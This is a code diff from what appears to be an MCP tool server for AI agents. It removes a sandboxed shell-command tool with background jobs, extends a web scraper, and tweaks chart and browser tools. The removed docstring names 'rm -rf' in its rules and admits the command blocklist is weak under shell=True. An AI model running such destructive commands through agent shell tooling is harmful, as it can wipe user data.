-    command="npm run build",
-    workspace_id="ws-1",
-    agent_id="agent-1",
-    session_id="session-1",
-    cwd="frontend"
-)
-# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
-```
-
-### Running tests with output
-```python
-result = execute_command_tool(
-    command="pytest -v",
-    workspace_id="ws-1",
-    agent_id="agent-1",
-    session_id="session-1"
-)
-# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
-```
-
-### Handling command failures
-```python
-result = execute_command_tool(
-    command="nonexistent-command",
-    workspace_id="ws-1",
-    agent_id="agent-1",
-    session_id="session-1"
-)
-# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
-```
-
-### Running git commands
-```python
-result = execute_command_tool(
-    command="git status",
-    workspace_id="ws-1",
-    agent_id="agent-1",
-    session_id="session-1",
-    cwd="repo"
-)
-# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
-```
-
-## Notes
-
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
@@ -1,3 +0,0 @@
-from .execute_command_tool import register_tools
-
-__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
-"""In-process registry of long-running shell jobs spawned by
-``execute_command_tool(run_in_background=True)``.
-
-Jobs are keyed on a short id the tool returns to the agent. The agent
-can then call ``bash_output(id=...)`` to poll for new output and
-``bash_kill(id=...)`` to terminate. Each job is scoped to an
-``agent_id`` so two agents sharing the same MCP server can't see or
-kill each other's work.
-
-The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
-so a runaway process can't exhaust memory. Older bytes are dropped with
-a one-time ``[truncated N bytes]`` marker prepended to the returned
-text.
-"""
-
-from __future__ import annotations
-
-import asyncio
-import time
-from collections import deque
-from dataclasses import dataclass, field
-from uuid import uuid4
-
-# 64 KB rolling window per stream. Large enough for long build logs,
-# small enough that a bash infinite loop can't OOM the MCP process.
-_MAX_BUFFER_BYTES = 64 * 1024
-
-
-@dataclass
-class _RingBuffer:
-    """Append-only byte buffer with a hard byte ceiling and per-read
-    offset tracking so each bash_output call only returns new bytes.
-    """
-
-    max_bytes: int = _MAX_BUFFER_BYTES
-    # deque of (global_offset, bytes) chunks. global_offset is the total
-    # bytes written prior to this chunk; lets us compute "bytes since
-    # last poll" without copying.
-    _chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
-    _total_written: int = 0
-    _total_dropped: int = 0
-    _read_cursor: int = 0
-
-    def write(self, data: bytes) -> None:
-        if not data:
-            return
-        self._chunks.append((self._total_written, data))
-        self._total_written += len(data)
-        # Evict from the front until we're under the ceiling.
-        current_bytes = sum(len(c) for _, c in self._chunks)
-        while current_bytes > self.max_bytes and self._chunks:
-            dropped_offset, dropped = self._chunks.popleft()
-            self._total_dropped += len(dropped)
-            current_bytes -= len(dropped)
-            # Push the read cursor forward if the reader was still
-            # pointing at bytes we just evicted.
-            if self._read_cursor < dropped_offset + len(dropped):
-                self._read_cursor = dropped_offset + len(dropped)
-
-    def read_new(self) -> str:
-        """Return any bytes since the last call, as decoded text.
-
-        Includes a ``[truncated N bytes]`` prefix if rolling-window
-        eviction dropped any bytes the reader hadn't yet consumed.
-        """
-        chunks_out: list[bytes] = []
-        cursor = self._read_cursor
-        for offset, chunk in self._chunks:
-            end = offset + len(chunk)
-            if end <= cursor:
-                continue
-            start_in_chunk = max(0, cursor - offset)
-            chunks_out.append(chunk[start_in_chunk:])
-            cursor = end
-        self._read_cursor = cursor
-        raw = b"".join(chunks_out)
-        text = raw.decode("utf-8", errors="replace")
-        # Surface eviction ONCE per poll so the agent knows to check
-        # the file system for larger logs instead of assuming it's got
-        # the full output.
-        if self._total_dropped > 0 and text:
-            text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
-        return text
-
-
-@dataclass
-class BackgroundJob:
-    id: str
-    agent_id: str
-    command: str
-    cwd: str
-    started_at: float
-    process: asyncio.subprocess.Process
-    stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
-    stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
-    _pump_task: asyncio.Task | None = None
-    exit_code: int | None = None
-
-    def status(self) -> str:
-        if self.exit_code is not None:
-            return f"exited({self.exit_code})"
-        if self.process.returncode is not None:
-            # Not yet surfaced by the pump but already finished.
-            return f"exited({self.process.returncode})"
-        return "running"
-
-
-# agent_id -> {job_id -> BackgroundJob}
-_jobs: dict[str, dict[str, BackgroundJob]] = {}
-_jobs_lock = asyncio.Lock()
-
-
-def _short_id() -> str:
-    return uuid4().hex[:8]
-
-
-async def _pump(job: BackgroundJob) -> None:
-    """Drain the child process's stdout/stderr into the ring buffers."""
-    proc = job.process
-
-    async def _drain(stream: asyncio.StreamReader | None, buf: _RingBuffer) -> None:
-        if stream is None:
-            return
-        while True:
-            chunk = await stream.read(4096)
-            if not chunk:
-                return
-            buf.write(chunk)
-
-    await asyncio.gather(
-        _drain(proc.stdout, job.stdout_buf),
-        _drain(proc.stderr, job.stderr_buf),
-    )
-    job.exit_code = await proc.wait()
-
-
-async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
-    """Start a subprocess in the background and register it. The caller
-    holds the job id returned from here and can poll via ``get()``.
-    """
-    proc = await asyncio.create_subprocess_shell(
-        command,
-        cwd=cwd,
-        stdout=asyncio.subprocess.PIPE,
-        stderr=asyncio.subprocess.PIPE,
-    )
-    job = BackgroundJob(
-        id=_short_id(),
-        agent_id=agent_id,
-        command=command,
-        cwd=cwd,
-        started_at=time.time(),
-        process=proc,
-    )
-    # Start pumping IO in the background so the ring buffers stay warm
-    # even if the agent doesn't poll for a while.
-    job._pump_task = asyncio.create_task(_pump(job))
-
-    async with _jobs_lock:
-        _jobs.setdefault(agent_id, {})[job.id] = job
-    return job
-
-
-async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
-    async with _jobs_lock:
-        return _jobs.get(agent_id, {}).get(job_id)
-
-
-async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
-    """SIGTERM a background job, escalating to SIGKILL after a grace
-    period. Returns a human-readable status string.
-    """
-    job = await get(agent_id, job_id)
-    if job is None:
-        return f"no background job with id '{job_id}'"
-    if job.process.returncode is not None:
-        status = f"already exited with code {job.process.returncode}"
-    else:
-        try:
-            job.process.terminate()
-        except ProcessLookupError:
-            pass
-        try:
-            await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
-            status = f"terminated cleanly (exit={job.process.returncode})"
-        except TimeoutError:
-            try:
-                job.process.kill()
-            except ProcessLookupError:
-                pass
-            await job.process.wait()
-            status = f"killed (SIGKILL, exit={job.process.returncode})"
-    # Deregister after kill so the id is no longer reachable.
-    async with _jobs_lock:
-        scope = _jobs.get(agent_id)
-        if scope is not None:
-            scope.pop(job_id, None)
-    return status
-
-
-async def clear_agent(agent_id: str) -> None:
-    """Test hook: kill every job owned by ``agent_id``."""
-    async with _jobs_lock:
-        scope = _jobs.pop(agent_id, {})
-    for job in scope.values():
-        if job.process.returncode is None:
-            try:
-                job.process.kill()
-            except ProcessLookupError:
-                pass
-            await job.process.wait()
@@ -1,222 +0,0 @@
-"""Shell command execution tool.
-
-Three tools are registered:
-
-* ``execute_command_tool`` runs a command synchronously with a per-call
-  timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
-  so the MCP event loop is not blocked while the child runs.
-* ``bash_output`` polls a background job started with
-  ``execute_command_tool(run_in_background=True)`` and returns any new
-  stdout/stderr since the last poll plus the current status.
-* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
-  a 3-second grace period).
-
-All three go through the same pre-execution safety blocklist in
-``command_sanitizer.py``.
-"""
-
-from __future__ import annotations
-
-import asyncio
-import os
-import time
-
-from mcp.server.fastmcp import FastMCP
-
-from ..command_sanitizer import CommandBlockedError, validate_command
-from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
-from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
-
-# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
-# would cause every command to fail. 600s maximum (10 min) is the same
-# ceiling Claude Code uses for its Bash tool; builds and test suites
-# longer than that should use run_in_background instead.
-_MIN_TIMEOUT = 1
-_MAX_TIMEOUT = 600
-_DEFAULT_TIMEOUT = 120
-
-
-def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
-    agent_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
-    os.makedirs(agent_root, exist_ok=True)
-    if cwd:
-        return get_sandboxed_path(cwd, agent_id)
-    return agent_root
-
-
-def register_tools(mcp: FastMCP) -> None:
-    """Register command execution tools with the MCP server."""
-
-    @mcp.tool()
-    async def execute_command_tool(
-        command: str,
-        agent_id: str,
-        cwd: str | None = None,
-        timeout_seconds: int = _DEFAULT_TIMEOUT,
-        run_in_background: bool = False,
-    ) -> dict:
-        """
-        Purpose
-            Execute a shell command within the agent sandbox.
-
-        When to use
-            Run validators, linters, builds, test suites
-            Generate derived artifacts (indexes, summaries)
-            Perform controlled maintenance tasks
-            Start long-running processes via ``run_in_background=True``
-            (dev servers, watchers, file-triggered builds)
-
-        Rules & Constraints
-            No network access unless explicitly allowed
-            No destructive commands (rm -rf, system modification)
-            Commands are validated against a safety blocklist before
-            execution. The blocklist runs through shell=True, so it
-            only prevents explicit nested shell executables.
-            timeout_seconds is clamped to [1, 600]. For longer-running
-            work use run_in_background=True + bash_output to poll.
-
-        Args:
-            command: The shell command to execute.
-            agent_id: The ID of the agent (auto-injected).
-            cwd: Working directory for the command (relative to the
-                agent sandbox). Defaults to the sandbox root.
-            timeout_seconds: Max wall-clock seconds the foreground
-                command is allowed to run. Ignored when
-                run_in_background=True. Default 120, max 600.
-            run_in_background: If True, spawn the command and return
-                immediately with a job id. Use bash_output(id=...) to
-                read output and bash_kill(id=...) to stop it.
-
-        Returns:
-            For foreground commands: dict with stdout, stderr, return_code,
-            elapsed_seconds.
-            For background commands: dict with id, pid, started_at, and
-            instructions for polling / killing the job.
-            On error: dict with an "error" key.
-        """
-        try:
-            validate_command(command)
-        except CommandBlockedError as e:
-            return {"error": f"Command blocked: {e}", "blocked": True}
-
-        try:
-            secure_cwd = _resolve_cwd(cwd, agent_id)
-        except Exception as e:
-            return {"error": f"Failed to resolve cwd: {e}"}
-
-        if run_in_background:
-            try:
-                job = await spawn_job(command, secure_cwd, agent_id)
-            except Exception as e:
-                return {"error": f"Failed to spawn background job: {e}"}
-            return {
-                "success": True,
-                "background": True,
-                "id": job.id,
-                "pid": job.process.pid,
-                "command": command,
-                "cwd": cwd or ".",
-                "started_at": job.started_at,
-                "hint": (
-                    "Background job started. Call "
-                    f"bash_output(id='{job.id}') to read output, or "
-                    f"bash_kill(id='{job.id}') to terminate it."
-                ),
-            }
-
-        # Foreground path: clamp timeout, spawn, wait with a watchdog.
-        try:
-            timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
-        except (TypeError, ValueError):
-            timeout = _DEFAULT_TIMEOUT
-
-        started = time.monotonic()
-        try:
-            proc = await asyncio.create_subprocess_shell(
-                command,
-                cwd=secure_cwd,
-                stdout=asyncio.subprocess.PIPE,
-                stderr=asyncio.subprocess.PIPE,
-            )
-        except Exception as e:
-            return {"error": f"Failed to execute command: {e}"}
-
-        try:
-            stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
-        except TimeoutError:
-            # Child is still running: kill it, drain what it already
-            # wrote so the agent gets a partial log, then report.
-            try:
-                proc.kill()
-            except ProcessLookupError:
-                pass
-            try:
-                stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
-            except (TimeoutError, Exception):
-                stdout_b, stderr_b = b"", b""
-            elapsed = round(time.monotonic() - started, 2)
-            return {
-                "error": (
-                    f"Command timed out after {timeout} seconds. "
-                    f"For longer work pass timeout_seconds (max 600) or "
-                    f"run_in_background=True."
-                ),
-                "timed_out": True,
-                "elapsed_seconds": elapsed,
-                "stdout": stdout_b.decode("utf-8", errors="replace"),
-                "stderr": stderr_b.decode("utf-8", errors="replace"),
-            }
-        except Exception as e:
-            return {"error": f"Failed while running command: {e}"}
-
-        return {
-            "success": True,
-            "command": command,
-            "return_code": proc.returncode,
-            "stdout": stdout_b.decode("utf-8", errors="replace"),
-            "stderr": stderr_b.decode("utf-8", errors="replace"),
-            "cwd": cwd or ".",
-            "elapsed_seconds": round(time.monotonic() - started, 2),
-        }
-
-    @mcp.tool()
-    async def bash_output(id: str, agent_id: str) -> dict:
-        """Poll a background command for new output and its current status.
-
-        Returns any stdout/stderr bytes written since the last call.
-        The status is one of "running", "exited(N)", or "killed".
-        When the job has finished and all output has been consumed, it
-        is removed from the registry on the next poll.
-
-        Args:
-            id: The job id returned from
-                execute_command_tool(run_in_background=True).
-            agent_id: The ID of the agent (auto-injected).
-        """
-        job = await get_job(agent_id, id)
-        if job is None:
-            return {"error": f"no background job with id '{id}'"}
-        new_stdout = job.stdout_buf.read_new()
-        new_stderr = job.stderr_buf.read_new()
-        return {
-            "id": id,
-            "status": job.status(),
-            "stdout": new_stdout,
-            "stderr": new_stderr,
-            "elapsed_seconds": round(time.time() - job.started_at, 2),
-        }
-
-    @mcp.tool()
-    async def bash_kill(id: str, agent_id: str) -> dict:
-        """Terminate a background command.
-
-        Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
-        if the process is still alive. The job id is then deregistered.
-
-        Args:
-            id: The job id returned from
-                execute_command_tool(run_in_background=True).
-            agent_id: The ID of the agent (auto-injected).
-        """
-        status = await kill_job(agent_id, id)
-        return {"id": id, "status": status}
@@ -10,12 +10,14 @@ Validates URLs against internal network ranges to prevent SSRF attacks.
 from __future__ import annotations

 import ipaddress
+import json
+import re
 import socket
 from typing import Any
 from urllib.parse import urljoin, urlparse
 from urllib.robotparser import RobotFileParser

-from bs4 import BeautifulSoup
+from bs4 import BeautifulSoup, NavigableString
 from fastmcp import FastMCP
 from playwright.async_api import (
    Error as PlaywrightError,
@@ -82,6 +84,7 @@ def register_tools(mcp: FastMCP) -> None:
        selector: str | None = None,
        include_links: bool = False,
        max_length: int = 50000,
+        offset: int = 0,
        respect_robots_txt: bool = True,
    ) -> dict:
        """
@@ -94,12 +97,18 @@ def register_tools(mcp: FastMCP) -> None:
        Args:
            url: URL of the webpage to scrape
            selector: CSS selector to target specific content (e.g., 'article', '.main-content')
-            include_links: Include extracted links in the response
-            max_length: Maximum length of extracted text (1000-500000)
+            include_links: When True, links are inlined as `[text](url)` in
+                content and also returned as a `links` list
+            max_length: Maximum length of extracted text returned in this call (1000-500000)
+            offset: Character offset into the extracted text. Use with
+                `next_offset` from a prior truncated result to paginate.
            respect_robots_txt: Whether to respect robots.txt rules (default True)

        Returns:
-            Dict with scraped content (url, title, description, content, length) or error dict
+            Dict with: url, final_url, title, description, page_type
+            (article|listing|page), content, length, offset, total_length,
+            truncated, next_offset, headings, structured_data (json_ld + open_graph),
+            and optionally links. On error, returns {"error": str, ...} with a hint when applicable.
        """
        try:
            # Validate URL
@@ -128,6 +137,7 @@ def register_tools(mcp: FastMCP) -> None:
                            "error": f"Blocked by robots.txt: {url}",
                            "url": url,
                            "skipped": True,
+                            "hint": ("Pass respect_robots_txt=False if you have authorization to scrape this site."),
                        }
                except Exception:
                    pass  # If robots.txt can't be fetched, proceed anyway
@@ -195,7 +205,17 @@ def register_tools(mcp: FastMCP) -> None:
                        return {"error": "Navigation failed: no response received"}

                    if response.status != 200:
-                        return {"error": f"HTTP {response.status}: Failed to fetch URL"}
+                        hint = (
+                            "Site likely requires auth, blocks bots, or is rate-limiting."
+                            if response.status in (401, 403, 429)
+                            else "Resource may not exist or server may be down."
+                        )
+                        return {
+                            "error": f"HTTP {response.status}: Failed to fetch URL",
+                            "url": url,
+                            "status": response.status,
+                            "hint": hint,
+                        }

                    content_type = response.headers.get("content-type", "").lower()
                    if not any(t in content_type for t in ["text/html", "application/xhtml+xml"]):
@@ -218,63 +238,176 @@ def register_tools(mcp: FastMCP) -> None:

            # Parse rendered HTML with BeautifulSoup
            soup = BeautifulSoup(html_content, "html.parser")
+            base_url = str(response.url)  # Final URL after redirects
+
+            # Extract structured data BEFORE noise removal — JSON-LD lives
+            # in <script>, which gets decomposed below. JSON-LD is often the
+            # cleanest source of structured info on listing pages.
+            json_ld: list[Any] = []
+            for script in soup.find_all("script", type="application/ld+json"):
+                raw = script.string or script.get_text() or ""
+                if raw.strip():
+                    try:
+                        json_ld.append(json.loads(raw))
+                    except (json.JSONDecodeError, TypeError):
+                        pass
+
+            open_graph: dict[str, str] = {}
+            for meta in soup.find_all("meta"):
+                prop = (meta.get("property") or "").strip()
+                if prop.startswith("og:"):
+                    val = (meta.get("content") or "").strip()
+                    if val:
+                        open_graph[prop[3:]] = val

            # Remove noise elements
            for tag in soup(["script", "style", "nav", "footer", "header", "aside", "noscript", "iframe"]):
                tag.decompose()

-            # Get title and description
+            # Get title and description (fall back to OG description)
            title = soup.title.get_text(strip=True) if soup.title else ""
-
            description = ""
            meta_desc = soup.find("meta", attrs={"name": "description"})
            if meta_desc:
-                description = meta_desc.get("content", "")
+                description = meta_desc.get("content", "") or ""
+            if not description:
+                description = open_graph.get("description", "")

-            # Target content
+            # Headings outline (capped) — lets the agent drill in via selector
+            headings: list[dict[str, Any]] = []
+            for h in soup.find_all(["h1", "h2", "h3", "h4", "h5", "h6"]):
+                h_text = h.get_text(strip=True)
+                if h_text:
+                    headings.append({"level": int(h.name[1]), "text": h_text})
+                if len(headings) >= 100:
+                    break
+
+            # Page-type heuristic: many <article> blocks → listing page
+            article_count = len(soup.find_all("article"))
+            if article_count >= 3:
+                page_type = "listing"
+            elif article_count == 1 or soup.find("main"):
+                page_type = "article"
+            else:
+                page_type = "page"
+
+            # Locate target subtree
            if selector:
                content_elem = soup.select_one(selector)
                if not content_elem:
-                    return {"error": f"No elements found matching selector: {selector}"}
-                text = content_elem.get_text(separator=" ", strip=True)
+                    return {
+                        "error": f"No elements found matching selector: {selector}",
+                        "url": url,
+                        "hint": "Try a broader selector or omit selector to use auto-detection.",
+                    }
            else:
-                # Auto-detect main content
-                main_content = (
-                    soup.find("article")
-                    or soup.find("main")
+                # Prefer <main> over the first <article> — on listing pages
+                # the latter would drop every article after the first.
+                content_elem = (
+                    soup.find("main")
                    or soup.find(attrs={"role": "main"})
+                    or soup.find("article")
                    or soup.find(class_=["content", "post", "entry", "article-body"])
                    or soup.find("body")
                )
-                text = main_content.get_text(separator=" ", strip=True) if main_content else ""

-            # Clean up whitespace
-            text = " ".join(text.split())
+            # Collect link metadata BEFORE rewriting anchors (rewriting
+            # replaces <a> elements with NavigableStrings, so find_all('a')
+            # would miss them after).
+            links: list[dict[str, str]] = []
+            if content_elem and include_links:
+                for a in content_elem.find_all("a", href=True)[:50]:
+                    link_text = a.get_text(strip=True)
+                    href = urljoin(base_url, a["href"])
+                    if link_text and href:
+                        links.append({"text": link_text, "href": href})

-            # Truncate if needed (reserve 3 chars for the ellipsis so the
-            # final string stays within max_length)
-            if len(text) > max_length:
-                text = text[: max_length - 3] + "..."
+            text = ""
+            if content_elem:
+                # Inline anchors as [text](url) so links survive text
+                # extraction (otherwise the agent has to correlate `links`
+                # against the text blob).
+                if include_links:
+                    for a in content_elem.find_all("a", href=True):
+                        link_text = a.get_text(strip=True)
+                        if link_text:
+                            href = urljoin(base_url, a["href"])
+                            a.replace_with(NavigableString(f"[{link_text}]({href})"))
+
+                # Convert <br> and block elements into newlines so the output
+                # preserves paragraph/list/heading structure rather than
+                # collapsing into one giant whitespace-joined string.
+                for br in content_elem.find_all("br"):
+                    br.replace_with(NavigableString("\n"))
+                block_tags = (
+                    "p",
+                    "h1",
+                    "h2",
+                    "h3",
+                    "h4",
+                    "h5",
+                    "h6",
+                    "li",
+                    "tr",
+                    "div",
+                    "section",
+                    "article",
+                    "blockquote",
+                )
+                for block in content_elem.find_all(block_tags):
+                    block.insert_before(NavigableString("\n"))
+                    block.append(NavigableString("\n"))
+
+                raw_text = content_elem.get_text(separator=" ")
+
+                # Normalize: squash spaces within each line, collapse runs of
+                # blank lines to a single blank, trim.
+                cleaned: list[str] = []
+                blank = True  # swallow leading blanks
+                for line in raw_text.split("\n"):
+                    line = re.sub(r"[ \t]+", " ", line).strip()
+                    if line:
+                        cleaned.append(line)
+                        blank = False
+                    elif not blank:
+                        cleaned.append("")
+                        blank = True
+                text = "\n".join(cleaned).strip()
+
+            # Apply offset/truncation with continuation metadata. Reserve 3
+            # chars for the ellipsis so the returned string stays within
+            # max_length (back-compat with existing test expectations).
+            total_length = len(text)
+            offset = max(0, min(offset, total_length))
+            end = offset + max_length
+            truncated = end < total_length
+            sliced = text[offset:end]
+            if truncated and len(sliced) >= 3:
+                sliced = sliced[:-3] + "..."
+
+            structured_data: dict[str, Any] = {}
+            if json_ld:
+                structured_data["json_ld"] = json_ld
+            if open_graph:
+                structured_data["open_graph"] = open_graph

            result: dict[str, Any] = {
                "url": url,
+                "final_url": base_url,
                "title": title,
                "description": description,
-                "content": text,
-                "length": len(text),
+                "page_type": page_type,
+                "content": sliced,
+                "length": len(sliced),
+                "offset": offset,
+                "total_length": total_length,
+                "truncated": truncated,
+                "next_offset": end if truncated else None,
+                "headings": headings,
            }
-
-            # Extract links if requested
+            if structured_data:
+                result["structured_data"] = structured_data
            if include_links:
-                links: list[dict[str, str]] = []
-                base_url = str(response.url)  # Use final URL after redirects
-                for a in soup.find_all("a", href=True)[:50]:
-                    href = a["href"]
-                    # Convert relative URLs to absolute URLs
-                    absolute_href = urljoin(base_url, href)
-                    link_text = a.get_text(strip=True)
-                    if link_text and absolute_href:
-                        links.append({"text": link_text, "href": absolute_href})
                result["links"] = links

            return result
@@ -29,11 +29,7 @@ def register_chart_tools(mcp: FastMCP) -> list[str]:

    register_tools(mcp)

-    return [
-        name
-        for name in mcp._tool_manager._tools.keys()
-        if name.startswith("chart_")
-    ]
+    return [name for name in mcp._tool_manager._tools.keys() if name.startswith("chart_")]


 __all__ = ["register_chart_tools"]
@@ -247,9 +247,7 @@ async def _render_in_page(
        # expected to have already coerced JSON-string specs into dicts
        # in chart_tools/tools.py — this is a defense-in-depth check.
        if isinstance(spec, str):
-            raise RendererError(
-                "spec arrived as a string; it should have been parsed to a dict in chart_render"
-            )
+            raise RendererError("spec arrived as a string; it should have been parsed to a dict in chart_render")
        try:
            json.dumps(spec)
        except (TypeError, ValueError) as exc:
@@ -273,13 +271,60 @@ async def _render_in_page(
                // data points are missing (the 2026-05-01 "all data
                // points are gone" bug). We don't need animation in
                // a static PNG anyway.
+                //
+                // Disjoint-region layout policy. ECharts has no auto-
+                // layout for component overlap (verified against the
+                // option reference): title/legend/grid are absolutely
+                // positioned and ignore each other. We enforce three
+                // non-overlapping regions:
+                //   - Title: anchored to TOP (top:16, no bottom)
+                //   - Legend: anchored to BOTTOM (bottom:16, no top)
+                //     except when orient:'vertical' (side legend)
+                //   - Grid: middle, with containLabel for axis labels
+                // Strips user-supplied vertical positions so an agent
+                // spec like `legend.top:"8%"` (which lands inside the
+                // title at chat-bubble dimensions — the 2026-05-01
+                // bug) can't collide. Horizontal anchoring (left/right)
+                // is preserved so e.g. left-aligned legends still work.
+                // Other fields (text, data, formatter, etc.) win as
+                // normal via Object.assign middle position.
+                const userTitle = option.title || {};
+                const userLegend = option.legend;
+                const userGrid = option.grid || {};
+                const legendVertical = userLegend && userLegend.orient === 'vertical';
+                const stripV = (o) => {
+                  const c = Object.assign({}, o);
+                  delete c.top; delete c.bottom; return c;
+                };
                const sanitized = Object.assign({}, option, {
                  animation: false,
                  animationDuration: 0,
                  animationDurationUpdate: 0,
                  animationEasing: 'linear',
                  animationEasingUpdate: 'linear',
+                  title: Object.assign({left: 'center'}, stripV(userTitle), {top: 16}),
+                  grid: Object.assign({left: 56, right: 56}, stripV(userGrid), {
+                    // Force vertical bounds — user-supplied grid.top /
+                    // grid.bottom (often percentage strings like "8%"
+                    // that the agent picks at default dimensions) don't
+                    // generalize across chat-bubble sizes. Bottom must
+                    // clear bottom-anchored legend (~36px) plus xAxis
+                    // name (containLabel handles tick labels but NOT
+                    // axis names; that's outerBoundsMode in v6+, we're
+                    // on v5). 96 with legend, 40 without.
+                    top: 64,
+                    bottom: userLegend && !legendVertical ? 96 : 40,
+                    containLabel: true,
+                  }),
                });
+                if (userLegend) {
+                  const legendDefaults = {
+                    icon: 'roundRect', itemWidth: 12, itemHeight: 12, itemGap: 16,
+                  };
+                  sanitized.legend = legendVertical
+                    ? Object.assign(legendDefaults, userLegend)
+                    : Object.assign(legendDefaults, stripV(userLegend), {bottom: 16});
+                }

                // Signal "render complete" via window.__chartReady so
                // the Python side knows when it's safe to screenshot.
@@ -119,15 +119,15 @@ def build_theme(theme: str = "light") -> dict:
            "axisTick": {"show": False},
            "axisLabel": {"color": fg_muted, "fontSize": 11, "margin": 14},
            "splitLine": {"lineStyle": {"color": grid_line, "type": "dashed"}},
-            # Y-axis name vertically-centered on the axis instead of
-            # floating in the upper-left corner where it competes with
-            # the title and legend.
            "nameLocation": "middle",
            "nameGap": 44,
            "nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
-            "nameRotate": 90,
+            # Don't auto-rotate value-axis names — the theme can't tell
+            # xAxis (horizontal-bar) from yAxis (vertical-bar). Rotating
+            # both at 90° vertical-mounts the xAxis name on horizontal-
+            # bar charts and it collides with the legend (peer_val
+            # regression). Specs set nameRotate explicitly when needed.
        },
-        # Same for log/time/etc. — keep the look consistent.
        "logAxis": {
            "axisLine": {"show": False},
            "axisLabel": {"color": fg_muted, "fontSize": 11},
@@ -135,7 +135,6 @@ def build_theme(theme: str = "light") -> dict:
            "nameLocation": "middle",
            "nameGap": 44,
            "nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
-            "nameRotate": 90,
        },
        "timeAxis": {
            "axisLine": {"show": True, "lineStyle": {"color": axis_line}},
@@ -169,8 +168,8 @@ def build_theme(theme: str = "light") -> dict:
        # being CSS-hello-world green/red.
        "candlestick": {
            "itemStyle": {
-                "color": "#3d7a4a",      # up body
-                "color0": "#a8453d",     # down body
+                "color": "#3d7a4a",  # up body
+                "color0": "#a8453d",  # down body
                "borderColor": "#3d7a4a",
                "borderColor0": "#a8453d",
            },
@@ -174,9 +174,7 @@ def register_tools(mcp: FastMCP) -> None:
                # browser-side flakes. We retry once for the latter; if
                # the second attempt fails too, surface the error so the
                # agent can fix it.
-                logger.warning(
-                    "chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc
-                )
+                logger.warning("chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc)
                if attempt == 0:
                    await asyncio.sleep(0.15)
                    continue
@@ -41,7 +41,7 @@ def register_tools(mcp: FastMCP) -> None:
    """Register all GCU browser tools with the MCP server.

    Tools are organized into categories:
-    - Lifecycle: browser_start, browser_stop, browser_status
+    - Lifecycle: browser_setup, browser_status, browser_stop (browser_open lazy-creates the context)
    - Tabs: browser_tabs, browser_open, browser_close, browser_activate_tab
    - Navigation: browser_navigate, browser_go_back, browser_go_forward, browser_reload
    - Inspection: browser_screenshot, browser_snapshot, browser_console
@@ -642,7 +642,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_snapshot", params, result=result)
            return result

@@ -727,7 +727,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_html", params, result=result)
            return result

@@ -153,7 +153,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_click", params, result=result)
            return result

@@ -247,7 +247,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_click_coordinate", params, result=result)
            return _text_only(result)

@@ -352,7 +352,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_type", params, result=result)
            return result

@@ -432,7 +432,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_type_focused", params, result=result)
            return result

@@ -506,7 +506,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
            log_tool_call("browser_press", params, result=result)
            return result

@@ -560,7 +560,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:

        ctx = _get_context(profile)
        if not ctx:
-            result = {"ok": False, "error": "Browser not started. Call browser_start first."}
+            result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
